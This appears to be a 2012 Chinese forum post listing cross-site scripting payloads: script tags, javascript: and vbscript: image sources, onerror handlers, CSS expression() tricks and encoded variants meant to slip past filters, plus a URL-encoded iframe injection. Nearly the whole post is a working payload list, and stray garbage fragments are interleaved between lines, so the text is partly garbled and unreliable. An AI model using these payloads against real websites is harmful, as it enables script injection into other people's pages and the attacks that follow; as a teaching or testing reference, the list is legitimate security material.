<script>alert("跨站")</script> (最常用)
. |3 [! @* j0 I4 p0 H2 n<img scr=javascript:alert("跨站")></img>
8 \6 v: Z! q. i<img scr="javascript: alert(/跨站/)></img>
, m2 X% p* d9 ~- _4 L4 ?% ]<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)6 C- p/ g5 k$ @* M7 t+ {& J
<img scr="#" onerror=alert(/跨站/)></img>( I2 Q: _7 d. k3 l7 n0 p
<img scr="#" style="xss:expression(alert(/xss/));"></img>
5 Q3 g; _' v5 O; f<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)) F; d5 S! C# k5 D9 N
<img src=vbscript:msgbox ("xss")></img>8 h8 a% n8 N7 G u! w
<style> input {left:expression (alert('xss'))}</style>
5 g9 S) A: x& _; h<div style={left:expression (alert('xss'))}></div>, x9 X; K b7 s
<div style={left:exp/* */ression (alert('xss'))}></div>
, F* B4 B" B- B- V9 H, u<div style={left:\0065\0078ression (alert('xss'))}></div>; d( N, ?8 P# o9 h! k. [9 K$ X
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
' D N/ X# B# p+ p$ y' sunicode <div style="{left:expRessioN (alert('xss'))}">
' N: P0 H; Y3 e2 r7 s( k% u! L" f
- G* Z9 w5 k( L+ V( e"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["$ a; m5 ^3 ^- B! l, B0 r# G& E
|
发表于 2012-9-15 14:09:13
收藏
支持
反对